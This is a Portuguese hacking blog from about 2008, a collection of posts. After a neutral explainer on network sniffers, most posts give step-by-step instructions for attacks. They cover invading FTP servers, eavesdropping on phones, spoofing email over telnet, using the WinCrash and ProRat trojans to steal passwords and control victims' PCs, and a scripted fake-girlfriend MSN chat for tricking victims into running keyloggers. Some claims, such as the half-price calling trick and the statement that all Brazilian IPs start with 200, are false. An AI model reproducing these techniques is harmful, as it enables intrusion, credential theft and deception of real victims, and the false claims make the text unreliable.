Certamente que todos já ouviram falar em sniffers de rede… Mas afinal o que é isto?
O que é um sniffer?
Um sniffer não é nada mais nem menos que uma aplicação (também pode ser hardware) que analisa e monitoriza todo o tráfego que passa num segmento da nossa rede. Pode ser usado por Hackers para "capturar/roubar" dados importantes pois no meio dos pacotes capturados podem estar passwords e outros dados pessoais de um determinado utilizador mas, é também uma ferramenta de eleição usada por quase todos os administradores de redes, pois permite detectar e posteriormente resolver muito problemas que por vezes acontecem numa determinada rede.
Com um sniffer, podemos monitorizar o acesso a determinados serviços de rede como por exemplo e-mail, acesso remoto (telnet, rlogin), transferência de ficheiros (FTP), etc. Permite-nos ainda identificar a existem de tráfego anormal na nossa rede. Um exemplo vulgar, é alguém mal intencionado andar pela nossa rede à procura de dados, como por exemplo passwords, para mais tarde poder usar. Imaginem que os dados que passam na nossa rede não estão criptografados? Óptimo para o hacker !!!
Os sniffers mais conhecidos para sistemas Linux são o tcpdump, ethereal. Para Windows também existe o ethereal, ou winshark que foi concebido pelos mesmos autores do ethereal. Se fizerem uma pesquisa no Google irão encontrar muitas referências a sniffers. Aqui têm uma lista com alguns deles. O processo de "sniffing" está associado a uma ou mais interfaces de rede de um determinado computador.
Postado por BTHacker às 13:38
0 comentários
Quarta-feira, 14 de Maio de 2008
Ultimamente nas salas de bate-papo (chats), ouve-se muitos "lamerzinhos" de merda fazendo ameaças a usuários comuns do tipo: "Vou rastrear seu ip... e depois viu te nunkar". Arghhh!! eu não agüento ler estas mensagens, principalmente vindo de lamers. Por isso que resolvi escrever este texto para usuários aprendam a se denfeder de lamers.
Para começar eu quero lembrar que hoje em dia os chats mais modernos, tem um esquema de segurança muito bom como: Filtro de comandos HTML e travas de scripts, com isso não é em todo chat que estas dicas vão funcionar...
.
1-) Rastrear Ip em salas que não aceitam comandos de HTML
.
No windows existe um programa chamado ARP, este programa é o 1º passo rastrear um IP. Como usar:
.
Espere a vitíma lhe mandar um Msg e depois vá até o prompt do MS-DOS e digite :
ARP -A
.
Será listado todos os IPs que lhe mandaram mensagens.
.
2-) Rastrear IP em salas que aceitam comandos de HTML
Tente fazer assim....
A ultima pessoa que vc conversou vai se a ultima a apareçe...
Usem com moderação
Postado por BTHacker às 19:45
1 comentários
4 maneiras de rastrear chamadas de celular
Fazendo escuta clandestina em telefones celulares.
Aviso: Escuta clandestina é um crime previsto por lei e da cana! Por isso aprenda a correr seus riscos, eu não me responsabilizo por nemhum de seus atos.
Ultilizando aparelhos motorola.
Primeiro tire a bateria do seu celular , depois de abrir o celular ira ter umas partes de metal embaixo do celular ,Três riscos de metal ||| , pegue um pedaço de papel alumínio e bote nos riscos de metal ,depois bote a bateria ,e ligue o celular, ira acontecer umas coisas , digite #1008# e depois de digitar o numero é só ouvir as conversas telefônicas.
Ultilizando aparelhos Ericson.
1 - Pressione a tecla FCN e com ela pressionada apertar os números 90- 40- 59.
2 - Solte a tecla FCN. Deverá aparecer na tela a mensagem TESTE INPUT.
3 – Aperte então 1 * 1 # 01 # #.
4 - Pronto, você entrou no canal 01, para ir mudando de canais basta ir apertando a tecla de volume até achar alguma conversa interessante.
5 - Para tirar do modo de escuta, você deve retirar a bateria do celular.
Ultilizando aparelhos de televisão.
Este texto contém informações consideráveis que ensinam como fazer escuta celular
via TV(pode se necessário usar o manual da TV). Nos avisamos que fazer escuta
celular é ilegal de acordo com a ECPA, e estas informações são exclusivamente para
uso e propósito educacional não nos responsabilizamos pelo mal uso das
informações aqui contidas. TV VHF canais 70 - 83 pegue a melhor distribuição do
melhor tronco usado pelos celulares. Este é o que distribui nesse fluxo. Sintonize
esses canais ajustando-os a sua atual freqüência e você estar preparado para fazer
a escuta. Cada canal da TV obrigara 5Mhz com ótimo controle de sintonia. Se
mesmo assim você não tiver uma freqüência exata você precisará ler sobre
freqüência e você terá uma boa idéia de como obter uma exata. Se a sensibilidade não
estiver boa mesmo você estando na cidade, ou perto de uma freqüência exata você
pegara alguma coisa. Você poderá também pegar transmissões de negócios no
tronco móvel se o mesmo estiver fechado, as transmissões não serão ilegais a
menos que a conversa esteja codificada então você poderá usar a velha TV para
achar outro local de negócios que use freqüências entre 800Mhz ou mais.
Ultilizando um rádio comum.
Os telefones em questão, são telefones sem fio. Eles transmitem suas ondas por
FM. Sendo assim, o que você tem que fazer é descobrir a freqüência. Mas, tem as
suas restrições. À não ser que seja um rádio com uma antena muito forte, ele tem
que ficar perto da base do telefone. Uma freqüência que descobri é 93,9MHz, mas
não quer dizer que todas sejam assim. E não é ligar apenas ligar o rádio e escutar.
Leva-se um tempinho para poder sintonizar. Mas depois de sintonizada no ponto
exato, você poderá escutar perfeitamente.
Postado por BTHacker às 19:42
0 comentários
Para fazer uma ligação gastando a metade do preço é muito simples, pegue o número a ser discado no nosso exemplo seria 982-5567. Dai você pega o último dígito, no nosso caso é "7" e subitrai de 10. Então "10 - 7 = 3", dai é só adicionar ao número inicial do telefone.
O resultado daria : 982-55673.
Mas se o ultimo dígito for "0", Fudeu? Não! Dai é mais simples, é só você adicionar zero ao final do número.
Ex: Telefone : 982-8790. Logo teremos: 982-87900. Simples não ?
Postado por BTHacker às 19:32
0 comentários
Invasão Por FTP 2 parte Oque é cavalo de troia!!!
Invasão Por FTP
Cavalo de tróia
Para começar vamos definir o que é cavalo de tróia. Cavalo
de tróia nada mais é do que um programa que emula o layout de
um sistema para capturar senhas ou outras informações.
Geralmente o hacker passa o programa como se fosse uma mensagem (e-mail) ou "joguinho" novo
para o usuário que deseja invadir. Quando o usuário acessa o
cavalo de tróia este grava os dados e se conecta com seu criador, este
tipo de ataque só é viável para hackers que tem um ótimo
conhecimento em java e C+ +, e outras linguagens que oferecem ferramentas de
comunicação remota.
Farejamento de redes
Para acelerar a sua transmissão, os dados que entram nas redes, provenientes
de vários computadores, são agrupados em pacotes. O hacker cria
programas farejadores que monitoram a circulação desses pacotes
nas redes e procuram neles palavras como password e senha. Quando encontra,
o programa copia o pacote e o envia para o computador do hacker. Os dados chegam
codificados, mas isso não é problema para ele, que, em geral
conhece bem criptografia, o conjunto de técnicas que permite codificar
dados.
Investigação Social
É muito comum que usuários poucos experientes usem como sua
senha de acesso o nome dos filhos, da mulher, a data de aniversário
dele ou da esposa, ou alguma coisa relacionada com sua vida pessoal.
Programas invasores
É uma técnica muito usada no Brasil, onde as senhas na maioria
da vezes tem 6 caracteres e não são muito complicadas. O programa
invasor é um sistema que monta inúmeras combinações
de caracteres e números, até chegar a senha do usuário.
Mas a coisa não é tão simples assim, para o hacker fazer
um ataque deste tipo, ele nunca deve fazer de sua conta oficial e de sua casa.
O certo é fazer de um notebook, num telefone público de preferência
longe de sua residência e com intervalo de tempo longo, como 2 dias para
cada ataque, assim não se levanta suspeita.
Invadir um servidor via FTP
O hacker pode invadir um servidor de uma provedora via FTP e roubar o arquivo
de senha do servidor. geralmente o nome do arquivo é "passwd" ou "logs",
também é válido lembrar que estes arquivos vem criptografados,
dai você vai precisar de uma ferramente que descriptografe o arquivo,
(esta ferramenta á fácil encontrada na internet) lembrando que
não é 100% eficiente.
Obs. tome muito cuidado quando for invadir um servidor para roubar um arquivo
de senhas, porque se te rastrearem, você tá fudido até sua
5º geração, é cadeia na certa, e se você for
de menor quem vai se fuder vão ser seus pais, por isso pense antes de
sair por ai invadindo servidores de provedoras.
Dedução
É realmente a técnica mais utilizada por hackers experientes,
o hacker usa a lógica para quebrar a senha, contando com 3 dados fundamentais.
1 - Muitos usuários usam o login como senha ex. (login: peixe senha:
peixe)
2 - Muitos administradores usam a senha padrão do sistema.
3 - A maioria das senhas estão relacionadas com login ex. (login. Kurt
senha: Cobain)
Invadindo um F.T.P
Para Hackear um Servidor FTP, Primeiro vc deve saber o indereço do
Host ou seu IP, para
isto use o IPSCAN, digitando o IP Principal do Host:
.
Lista de Alguns FTP's:
ftp.mandic.com.br
ftp.bestway.com.br
ftp.internetclub.com.br
ftp.netscape.com
ftp.angelfire.com
Existem vários Programas de FTP'S, se não quizer saber de ftp
porra nehuma use o do DOS.
Va ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir
um outro Prompt (to), digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br.
Ao conectar ele pedirá a senha e o Password, tente user os passwords
UNIX, se não der vc
deve entrar INVISIVEL !
Como entrar invisível ?
No login precione ENTER, no password precione Novamente...
Ira aparecer o prompt ftp> novamente...., ai é só digitar...
quote user ftp , precione ENTER e digite:
quote cwd ~root
Precione ENTER novamente e digite:
quote pass ftp
Pronto, vc esta Hackeando...
Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não
esta
Hackeando.., pois esta aplicada a proteção..., para isto tente
com outro user tipo quote cwd
~sys e os outros da lista UNIX....
Não tente Hackear usando o user normal de FTP'S, que é login
: anonymous e password: seu
E-Mail, pois vai ser aplicado a proteção....
Ao entrar vc vai estar no Diretório do login, tipo \home\root\,
Dai, para ver a lista de users vc volta um dir vá para o dir \home\
e cada dir é um usuário,... não tentem pegar as senhas
, pois são Cryptografadas...
Pois a maioria dos users usa a mesma senha login....
Ok... se vc não sabe os comandos, ai vai a dica...., se vc estiver no
MS-DOS, digite ? e
tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear
!!!
Não fique mais que 5 Min em um servidor, pois ele caçara seu
IP, e seu login, e vai ser
CADEIA !!!
Obs: NUNCA APAGUE NADA!
Postado por BTHacker às 19:13
0 comentários
Domingo, 11 de Maio de 2008
Bom meus queridos vizitantes hj nessa tarde de Domingo dia 11 nós tomamos coragem e atualizamos o site com algumas coisas novas do vosso interesse quero que vc si divirta-se quebrando a proteção de alguns modens atráves do Ms de comando
Invadindo por IP-TCP
Todo mundo que tem o ms-dos instalado em seu computador, por isso, quase todo
mundo,
não sabe que tem um potente rastreador de endereço IP em sua
máquina.
Mas antes de tudo o que é endereço ip? Endereço IP é um
número que você recebe na
hora em que conecta ao seu servidor. Um exemplo de endereço IP é 200.200.200.200.
Os
três primeiros números representam o D.N.S. de seu servidor, e
o último o número que
varia. No Brasil, todos os IPs começam com 200.
Para rastrear você deve usar um programa chamado arp, que faz parte do
ms-dos. O
comando que deve ser digitado é arp -a. Você verá uma lista
de endereços IP. Mas como
saber qual é o IP da pessoa? Você deve ter certeza de que a última
informação que
chegou no seu modem veio da pessoa que você quer descobrir o IP, e daí entrar
com o
comando no prompt do ms-dos. O IP da pessoa será o primeiro.
Também existem outros programas como o netstat. Com ele você pode
rastrear qual é o
servidor da pessoa e outros. Mas esse programa é mais complicado, se
você quer saber
como usá-lo digite netstat -h , e a tela de ajuda aparece.
O que fazer com o endereço IP? Você pode nukar a pessoa. O nuke é um
programa que
envia uma mensagem de erro a porta 139, fazendo a conexão da vítima
cair. Você também
pode invadir o computador da pessoa usando o Back Orifice ou outro programa.
Cuidado, seu host e seu ip foram rastreados:
Postado por BTHacker às 12:14
0 comentários
Domingo, 27 de Abril de 2008
Manual do Wincras
O WinCrash é um programa dividido em duas partes, um Cliente e um Servidor... O
Cliente é o programa que você irá usar pra se conectar ao
Servidor pela internet ou por uma
rede interna com protocolo TCP/IP.
Para se conectar ao Servidor (server.exe) ele prescisa estar rodando no
computador que você deseja se conectar. O Servidor é invisivel, não aparecendo
nem no CTRL+ALT+DEL(lista de processos visiveis rodando)... Quando o Servidor é
executado, ele se auto-instala no
sistema, se executando toda vez que o
Windows reiniciar...
Para se conectar ao Servidor basta saber o IP (Internet Protocol). Os serviços
funcionam através de pacotes encriptados, usando como chave o IP local e o IP
remoto...
A Interface do Cliente é simples e fácil de entender, até pra quem não sabe
Inglês, pois as descrições dos serviços estão em Português...
Você pode usar o Cliente para operar o Servidor, tendo muito mais controle do
que a própria pessoa que está em frente ao micro remoto(Servidor)... Mas também
pode usa-lo só para se divertir com seus amigos.
Os Comandos:
ATENÇÃO.
Para cada comando no Cliente, existe um para desfazer
EX: Para o Open CD-Rom Drive, existe o Close CD-ROM Drive
Keyboard Lights Bomb
Faz com que as luzes do CAPS_LOCK e SCROLL_LOCK fiquem piscando sem parar de
meio em meio segundo.
Lock Mouse
Trava o mouse numa área pequena da tela, fazendo com que o Mouse não consiga
sair de lá, até que seja acionado o serviço "Mouse Unlock" no Cliente.
Move Mouse
Lhe dá opções variadas de mover o ponteiro do mouse do Servidor
Monitor OFF
Desliga o Monitor do Servidor
Flip Screen
Inverte a tela do Servidor
Open CD-ROM Drive
Abre a gaveta do CD-ROM do Servidor
Flood Server Printer
Imprime uma página com xingamentos na impressora do Servidor
Atenção. Certifique-se antes se a impressora do Servidor está ligada, pois se
não, o Servidor vai ficar travado ate a impressora seja ligada.
System Keys OFF
Desabilitas as sequencias de teclas do sistema, ex: CTRL+ALT+DEL, ALT+TAB e as
teclas especiais de alguns teclados (tecla ÿ )
Clipboard Lock
Trava a Área de Transferencia do Servidor com a mensagem "WinCrash"
Screen Saver Bomb
Ativa proteção de tela ( se existir ) do Servidor de 2 em 2 segundos
Hide Taskbar
Some com a barra de tarefas do Servidor
Hide Start Button
Some com o Botão Iniciar do Servidor
Disable Start Button
Desativa o Botão Iniciar do Servidor
Active the Screen Saver
Ativa proteção de tela ( se existir ) do Servidor
Remove Desktop Wallpaper
Remove o papel de parede do Servidor
Change Desktop Wallpaper
Lhe dá a possibilidade de escolher o papel de parede do Servidor
Atenção
A imagem prescisa estar no diretório Windows do Servidor. Ponha somente o nome
da
imagem para mudar o papel de parede
EXEMPLO : ondas.bmp
Modify Remote Date
Modifica a data do Servidor para 1/7/94. A data do lançamento do Real.
Close Server EXE
Fecha o Servidor até que o Windows reinicie
Delete Server EXE
Deleta o aplicativo Servidor WinCrash da vítima
Lock Up the System *
Trava o Computador do Servidor
Close all Programs *
Fecha todos os programas e faz log-out do Windows no micro do Servidor
Exit Windows *
Fecha o Windows do Servidor
Shutdown Windows *
Desliga o Windows
MSG Box [Chat]
Abre uma janela de chat pra você poder conversar com o Servidor. Dentro da
janela de chat tem 3 botões
(Flood, Beep, Joke)
Flood - Faz com que o Servidor fique muito lento, exibindo milhares de mensagens
continuas na tela do Servidor
Beep - Toca um BEEP no Servidor . O Servidor também pode mandar um BEEP para
você
Joke - Faz com que a cada 2 minutos seja exibida uma mensagem irritante no
Servidor
Send Text
Você poder mandar um texto para a janela ativa do Servidor
EXEMPLO. Você manda o texto "WinCrash Rulez" para o Servidor, se o Servidor
estiver com por exemplo o "Bloco de Notas" aberto a mensagem "WinCrash Rulez"
vai aparecer no texto
Get Server Information
Pega o nome, a empresa, a data da BIOS, o processador e quantidade de memória do
Servidor. Se você apertar o Botão "Save Information on TXT" o WinCrash ira gerar
um arquivos chamado "Info.txt" no diretório do WinCrash.
View Remote Passwords
Lhe permite ver todas as senhas Dial-Up, navegador, e todas as senhas arquivadas
em cache...
Só visualiza aquelas senhas que foram salvas com o comando "Salvar Senha".
Se você apertar o Botão "Save Passwords on TXT" o WinCrash ira gerar um arquivos
chamado "Senhas.txt" no diretório do WinCrash contendo as senhas
View Remote Netstat
Lhe permite ver o Estato das portas e da conexão do Servidor . Você podera
descobrir se o Servidor está com o NetBus ou o BO Instalado..
View Active Process
Lhe permite ver os processos ativos (programas que estão rodando, até
escondidos) do Servidor, como o Servidor WinCrash
Open Server Hard Disk
Quando é acionado ele abre um FTP Server no Servidor. Isso quer dizer que você
poderá se conectar pelo seu Navegador de Internet ou seu programa de FTP
preferido no C:\ do Servidor. EXEMPLO: "ftp://IP_DO_SERVIDOR" e pronto, você
estara mexendo no Hard Disk do Servidor... Para prevenir futuros problemas feche
o servidor quando acabar de mexer, clicando em "Close Server Hard Disk"
Play Wav Files
Para você tocar um som do tipo Wav no Servidor.
EXEMPLO : C:\Windows\Media\tada.wav
Delete and Execute Files
Com esse comando você podera executar e deletar arquivos no Servidor. No comando
executar e deletar ja vem alguns programas e arquivos frequentemente encontrados
nos computadores. Mas você poderá por um programa específico que queira executar
ou deletar
EXEMPLO : Windows\Calc.exe
Atenção, não ponha C:\
Modify Remote Autoexec.bat
Modifica o Autoexec.bat do Servidor, transformando-o em varias linhas
irritantes, mas nada grave.
* O Cliente irá se desconectar após esses comandos
Perguntas mais frequentes (FAQ)
P : Como descubro o IP do Servidor?
R : Você pode usar o ICQ. Pegue um crack pra ele na nossa página para mostrar o
IP de todas as pessoas na sua lista no info.
Pode também usar o IRC, usando a tag: /dns <nick da pessoa>
P : Como faço para me conectar?
R : Depois de descobrir o IP do Servidor, pegue o IP e ponha no campo "Target IP"
do Cliente WinCrash.
P : Como faço para me conectar a mim mesmo?
R : Você prescisa rodar o Servidor(server.exe) na sua máquina. Para se conectar
sem usar a Internet use o IP "127.0.0.1"(loopback). Os comandos são exatamente
os mesmos.
Obs. Para remover o programa do sistema, use o serviço: Delete Server EXE
P : Como faço para remover o Server.exe ( Servidor )
R : Use o comando Delete Server EXE.
P : O comando "View Remote Passwords" não exibe nenhuma senha, o que eu faço?
R : Tente se conectar de novo. Mas provavelmente a causa do problema seja que o
Servidor não tenha salvo suas senhas com o comando "Salvar Senhas".
P : Os comandos "View Remote Passwords", "View Remote Netstat" e "View Active
Process" mostram seus items desalinhados, porque?
R : Isso acontece quando a conexão com o servidor é muito rápida (Ex : Você
estar conectado com você mesmo ). Provavelmente isso irá se alinhar quando você
estiver conectado com alguém da Internet.
Postado por BTHacker às 12:16
0 comentários
FakeMail pelo Telnet
Um jeito bem simples para mandar FakeMails. Para quem não sabe
fakemail eh mandar um e-mail fingindo ser uma outra pessoa.
A versão do Telnet (do Windows XP ou 9x) ou o sistema operacional
NÃO vai mudar o meio de fazer o FakeMail, só vai mudar o programa.
No Windows XP vá em: Iniciar, Executar, Telnet.exe
Você vai ver a tela:
Bem-vindo ao Cliente MS Telnet
O caractere de
escape é 'CTRL+ç'
Microsoft Telnet>
Digite: open
smtp.servidordeemails.com.br 25
No caso do
servidor que eu me conectei recebi a resposta:
220 smtp.provesul.com.br
ESMTP Postfix
(Esse comando pode variar para: HELLO, EHLO, HELO)
HELO
localhost
MAIL FROM:
seuemail@fakeaqui.com
RCPT TO:
vitimadofake@mailaqui.com
SUBJECT:
assunto
DATA
Digite o conteudo da
mensagem aqui
qundo voce acabar termine com um "." em uma linha em branco e de
enter.
QUIT
Pronto, e-mail fake enviado!!!
Algumas coisinhas importantes:
1. Para resetar as
configurações de quem vai receber e tudo mais digite "RSET"
2. Existem alguns
servidores SMTPs que bloqueiam o envio de e-mails sem colocar o
login e senha, então de nada vai adiantar tentar com esse
servidor...
3. Alguns servidores SMTPs
também bloqueiam alguns comandos, no SMTP que eu estava testando
eu consegia mandar os e-mail e tudo mais, mas não conseguia por o
assunto, quando eu colocava o comando "SUBJECT: Assunto" eu era
desconnectado, mesmo assim isso não impediu o envio do e-mail!
4. Não é possivel anexar
arquivos pelo Telnet (se existe eu não sei como faz ;P)
Divirtam-se!![/b]
Postado por BTHacker às 12:14
0 comentários
CRIANDO UM HD VIRTUAL DE 1 GB
E ai galera blz... quero a opnião de vcs sobre meu tutorial pra ve se eu
aprendi a lição direito Aceito Criticas Elogios e Sugestões, pois sem isso
não tem como eu melhorar a qualidade dos meus tópicos.
Bom primeiramente o intuito desse tutorial é ensinar a vocês a criarem uma hd
virtual pra compartilharem programas, arquivos e tudo mais... bom chega de fala
vamos trabalhar...
Primeiro vamos acessar o site.
http://www.4shared.com
Agora na tela principal, vamos clicar em sign up.
Em seguida colocamos nosso e-mail, senha "password" e escolhemos o plano free,
depois so clica em sign up de novo...
Certo agora estamos na nossa HD virtual.. ooohhhhh!!!!
Abaixo vou passar algumas configurações basicas, o resto num tem muito segredo e
qualquer duvida estamos aqui.
Bom primeiro vamos ativar o compartilhamento e configurar um "alias" pra ficar
mais facil quando os outros quiserem acessar nossa HD.
Na tela principal da nossa HD clique em activate.
Em seguida vamos cair nessa tela...
Numerei na imagem pra poder explicar melhor.
1 = É onde escolhemos se vamos ou não compartilhar nossos arquivos.
2 = Aqui vc pode optar por colocar uma senha para os outros acessarem sua HD...
Se vc deixar desabilitado qualquer um tem acesso... e nesse shared link, e o
link pra o pessoal acessar sua HD, mas no bloco 3 agente cria um alias q e bem
mais facil de passar pra alguem acessar...
3 = Como dito acima aqui nos criamos um alias pra nossa HD... um exemplo, o link
da minha HD seria:
http://www.4shared.com/dir/3668459/b2faea71/sharing.html
Mas com o alias fica somente:
http://scarecrow.4shared.com (Muito mais facil)
4 = Aqui e um dos passos mais importantes pq é aqui que nos vamos definir o
nivel de acesso dos que forem acessar nossa HD... mas como vcs podem ver são
permissões basicas então não tem muito segredo pra configurar...eu autorizei qse
tudo pq coloquei senha...mas vai de cada um..
Bom depois de configurar é só clicar em save e depois em my 4shared no lado
esquerdo em cima para voltar a pasta...
Agora na tela principal novamente, vamos ver os menus q temos...
1 = em upgrade nos defimos algumas configurações como a senha da nossa conta
"não e a senha do compartilhamento para os outros acessarem", o nome q sera
exibido como publisher quando os outros acessarem, e-mail e por ai vai...
2 = Aqui nos fazemos os uploads dos nossos arquivos" sugiro q crie pastas antes
(adiante o botão q cria pastas ) para melhor organização...no upload normal vc
upa um arquivo de cada vez e no multiupload vc faz varios de uma unica vez "como
se vcs não soubessem... " desde de que os arquivos tenham no maximo 50MB
"isso vcs num sabiam" ...
3 = item 3 como uma barra de ferramentas... vou falar delas da esquerda pra
direita:
Copiar, Recorta, Colar, Excluir, CRIAR PASTA, E-mail, thumbsnail, Folders....
Bom acho q é só galera... como eu disse no começo num tem muito segredo... agora
e so vcs criarem as HDS e sairem compartilhando pelos foruns....
Para quem quiser fuçar ma minha HD a Senha é: invasao
Num tem muita coisa lá so uns programas basicos, mas fiquem a vontade para
baixar....
Abraços a Todos
Espero q tenham gostado
Postado por BTHacker às 12:13
0 comentários
INTERNET DE GRAÇA NO CELULAR
Galera segue mais um tuto,mais não sei se funciona porque meu cel é cdma,e
tem que ser gsm,passei isso pra um amigo e ele disse que funfou
se alguem mais puder testar...
NET GRATIS NO CEL (EXPLICAÇÃO)
MENU > CONFIGURAÇÕES > CONFIGURAÇÃO > CONFIGURAÇÕES PESSOAIS
agora adiciona um novo
PONTO DE ACESSO (OPÇÕES > ADICIONAR NOVA > PONTO DE ACESSO)
Configuração do ponto de acesso:
NOME DA CONTA: *qualquer um* (DISCADA 0800)
CONFIGURAÇÕES DE PONTO DE ACESSO
PORTADORA DE
DADOS: Dados GSM
CONFIGURAÇÕES DA PORTADORA:
Número de discagem: 0800992190
Tipo de autenticação: Normal
Tipo de chamada de dados: Analógica
Velocidade da chamada de dados: automática
Nome de usuário: UU/ppp139378
Senha: aQ&J+Yev
Exibir janela de terminal: Não
agora ATIVA
OK?!
tem mais...
agora adiciona WEB (OPÇÕES > ADICIONAR NOVA > WEB)
Nome da conta: Web 0800
Homepage: *qualquer um*
Nome de usuário: dexa em branco
Senha: dexa em branco
Usar ponto de acesso preferido: Sim
agora ATIVA
---
MENU > CONFIGURAÇÕES > CONFIGURAÇÃO > CONFIGURAÇÕES PADRÃO
escolhe 'Configs pessoais'
PONTO DE ACESSO PREFERIDO
Escolhe 'Discada 0800'
-----
beleza?!
so tem um problema... so funciona uns 15min por vez...
heheeheh
Abcos
WORK
Postado por BTHacker às 12:11
2 comentários
UNS TRUQUES PARA FAKES DE MSN
Uma técnica muito usada para mandar Keylogger, Virus, Trojans ou outro tipo
de arquivo, eh usando o MSN Fake, onde geralmente faz um msn colocando no nick
frases muito gays e fotos de mulheres que sempre são "Gostosas", então vou
ensinar algumas técnicas que eu uso para MSN Fake que tem sempre 100% de
chance de funcionar.. simplesmente não tem como não conseguir..
Abaixo algumas coisas que não se deve esqueçer:
Na Escrita
Você apartir do momento que entro no MSN, tem que agir como mulher... tem que
fingir que é sentimental e sempre usar palavras como "obrigada" ou palavras que
tire a possibilidade que descubra que você é homem por exemplo, "ah eu queria ir
mais axu q naum vai dar rsrs".... mais se falar algo como "ahh tpw eu queria ir
mais nem vai dar xD" ai fica esquesito né? Então também eh muito importante
lembrar de não usar palavras que eh muito usada em msn por homens.. e
substitui-las por palavras meladas xDDD
E Também nunca dispensar a font Rosa hehe, ela ajuda muito
Nas Fotos
Uma ótima dica é nunca usar fotos dessas muiés que cata em site porno ou no
google, sempre de alguem que você conheça e que não tenha as mesmas fotos no
orkut pro exemplo uma prima...Assim a pessoa não fica desconfiada...
Tentando Mandar arquivo .exe
O Mais importante eh nunca ter pressa em mandar o arquivo... nem se demora 1
semana, o importante eh fazer ele pedir ... veja alguns exemplos:
Vítima:
Oi
MSN Fake:
Oie! *o* td bom?
Vítima:
td i vc?
MSN Fake:
tb rsrs.. ta fazendu o que de bom? haha
Vítima:
nada só conversando com vc..
MSN Fake:
ahhh assim eu fico com vergonha rsrs
Vítima:
hehe.. e ai tem alguma foto pra manda?
MSN Fake:
ahhh eu so gorda tenhu vergonha
Vítima:
eh nada vc eh mó gatinha
MSN Fake:
ahh olha q eu acreditu em hahaehaeh
Vítima:
ah manda ai vai ;D
MSN Fake:
tb vai.. só porque vc ta pedindo..
Vítima:
aee vlw!
MSN Fake:
kk d nada...
Nessas horas você envia uma foto.. de preferencia uma
que mostre o corpo inteiro
Vítima:
nussa q bunita! mais bunita que eu parecia na imagem de exibição
MSN Fake:
ahh brigada!!! mais eu sei que só ta falando issu pra me deixa feliz rsrs
Vítima:
q nada.. vc eh mó gata mesmu
MSN Fake:
ahh entaum vou acreditar em rsrs
Vítima:
hehe tem mais?
MSN Fake:
ah depois tiro umas pra vc =]
Vítima:
bl xDDD
MSN Fake:
mais ó.. do que adianta eu ser bunita se eu sou burra? :'(
Vítima:
eh nada vc n eh burra n...se falar algo parecido
acredite, vc ja conseguiu xD[/color]
MSN Fake:
eh q assim, eu to tentando fazer um video com minhas fotinhas.. mais n consigo
Vítima:
ahhh se quiser eu te ajudo [b]ou Nossa... mais vc n eh burra...
MSN Fake:
ebaaa!!! vou te mandar as fotos com o programa q to usando ta?
Caso não se ofereçer a ajudar fale vc
quer me ajuda? que ta tudo em ingles e n entendo nada...
Vítima:
Então manda ai q eu faço rapidão...OU Blz
vai... vou ver o que consigo fazer
Aqui vc manda um zip com o maximo de fotos possiveis
com um arquivo que noc aso deveria ser algo que intenda que seja um arquivo de
vídeo usando o icone por exemplo do windows media player...
MSN Fake:
Brigada depois que terminar me manda em.. inquanto vc vc recebe vo tomar um
bainhu bem gostoso e ja venhu *o* bjus
Vítima:
Ok
kkkk esse ai eh o que eu mais uso.. sempre funciona n tem como n catar o cara
agora se caso o cara abrir e falar q n conseguiu usar e n perceber q eh algum
tipo de arquivo q ele não esperava arrume alguma desculpa e depois fala que não
precisa mais com outra desculpa que deve ser muito boa, ai se caso ele descobrir
q eh algum tipo de arquivo q elenão esperava não vai zua o kara falando que
passou por exemplo KL... primeiro espera vc pegar por exemplo uma senha antes de
zua ele huaeuhaehuae...
Outras Dicas
Nunce fale nada sobre jogos e qualquer assunto sobre computador fale que vc não
entende muito sobre isso, assim o cara nunca vai suspeitar e também n ficar mto
tempo ON no msn fake pro cara pensar q eh algum cara viciadu hehe...
Então eh isso caso alguem for testar posta resultados kkk Flw.
Postado por BTHacker às 12:09
1 comentários
INVASÃO BÁSICA DE UM HACKER
Olá amigos, estou passando este vnc mais um tuto facin facin, pq eu e um
amigo editamos ele......vcs nunca viram um vnc tão simples de usar como esse!!!!
TUTORIAL:
1- Extraia os dois
arquivos;
2-Extraia o Acessar e o Server novamente para a Área de Trabalho;
3-Abra o Acessar;
4- Dê o seu jeitinho de Engenharia Social e pegue o Ip da Vítima
5-Faça com que a Vítima aceite o arquivo(Server.exe) e execute;
6-Abra o Acessar, coloque o ip da Vítima e Clique em Acessar;
E Pronto!!!, vc tem acesso ao pc da vítima, faça o que bem entender
O VNC não é um vírus, e quando a vítima o executa ele fecha sozinho e abre um
espaço vazio na barra de tarefas próximo ao relógio do windows.
Link do
Download:
Postado por BTHacker às 12:08
0 comentários
CONEXÃO COM NO-IP
Não me responsabilizo pelas
informaçoes abaixo, use do modo mais etico possivel.
Links de programas nescessarios :
ProRat:
http://www.prorat.net/downloads.php?id=ProRat_v1.9_Fix2
Molebox:
http://baixaki.ig.com.br/site/dwnld18199.htm
Bom antes de tudu, vou explicar o que é conexão reversa. E quandu você
liga seu
servidor a seu ip, quandu uma "vitima" estiver online, se seu trojan
estiver instalado, as informaçoes da pessoa, como o ip dela, irao para
você seu ip, e você poderar ver estar informações pelo ProRat
Antes de tudu, entre no
site
http://www.no-ip.com. Va em signup ! Após fazer sua conta
normalmente e ativando ela pelo imail você irar criar seu ip fixo.
COMO ASSIM IP FIXO ?? Sempre que você se conecta a internet, você recebe
um ip. Este site fara um ip unico para você, você escolhera um nome do seu
ip Ex: nefrei.no-ip.info. Mas como isso funciona ?? Logado na sua conta va
em ADD que está nas opçoes de Hosts / Redirects em uma barra esquerda do
site, la você da um nome ao seu ip fixo, e bota seu ip em numero ( PARA
VELO VA EM
http://WWW.MEUIP.COM.BR ). Deixe tudu do geito que está e va
em Creat Host. PRONTO VOCÊ TEM SEU IP FIXO ! Mas lembresse, toda vez ke
você se acessar a internet, seu ip tambem muda, então va em sua conta no
site, e mude o ip em numeros do seu IP FIXO, escolhendo a OPÇÃO manage da
barra Hosts / Redirects !
Pronto agora você tem seu ip-fixo. Va na pasta do ProRat, la existe um
programa chamado ProConective, abra-o , e deixe ele minimizado, agora abra
seu ProRat, Crie um servidor. Quando estiver criando, va em notificações e
bote seu ip fixo em Endereço Ip ( Dns ), se você escutar um som dizemdo "
conectado " e porque funcionou, termine de criar seu servidor. Junte ele a
outro programa qualquer e mande para a pessoa.
Depois que a pessoa tiver instalado o trojan, abra o ProRat, e va na opção
ProConetive, escolha a opção Começar a listar as Notificaçoes.
Pronto você recebera o ip da vitima e poderar fazer o que quiser.
